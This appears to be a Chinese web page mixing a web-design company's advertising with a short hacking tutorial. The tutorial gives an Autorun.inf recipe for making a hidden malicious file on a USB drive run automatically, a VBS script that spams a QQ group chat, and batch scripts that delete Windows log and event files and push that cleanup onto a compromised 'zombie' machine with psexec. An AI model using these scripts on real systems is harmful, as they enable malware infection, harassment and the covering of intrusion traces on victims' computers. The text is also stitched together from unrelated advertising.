重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
1、将可执行恶意文件放入U盘。并设置隐藏。
创新互联是一家专注于网站设计制作、网站设计与策划设计,江油网站建设哪家好?创新互联做网站,专注于网站建设10年,网设计领域的专业建站公司;建站业务涵盖:江油等地区。江油做网站价格咨询:13518219792
2、创建文件 Autorun.inf
3、写入内容:
[AutoRun] OPEN=恶意文件全名 shellexecute=恶意文件全名 shell\Atuo\command=恶意文件全名
隐藏本文件。
4、当U盘插入新的设备,操作人员双击U盘图标查看U盘时,会自动运行恶意文件。
VBS脚本,QQ群聊刷屏:
新建vbs后缀文件。内容如下:
Set WshShell= WScript.CreateObject("WScript.Shell") WshShell.AppActivate "群聊刷屏测试" for i=1 to 10 WScript.Sleep 500 WshShell.SendKeys "^v" WshShell.SendKeys i WshShell.SendKeys "%s" Next
#for i=1to 10”语句用来控制发送次数,表示发送10次
打开一个群聊天窗口并复制要发送的内容到剪贴板上,双击刚才生成的“qq.vbs”切换到群聊天窗口中,在其中可看到已自动刷屏了。
日志清除:
新建del.bat脚本
@del c:winntsystem32logfiles*.* @del c:winntsystem32config*.evt @del c:winntsystem32dtclog*.* @del c:winntsystem32*.log @del c:winntsystem32*.txt @del c:winnt*.txt @del c:winnt*.log @del c:del.bat
新建clean.bat
@copy del.bat \%1c$ @echo 向肉鸡复制本机的del.bat ……OK @psexec \%1 c:del.bat @echo 在肉鸡上运行del.bat ,清除日志文件……OK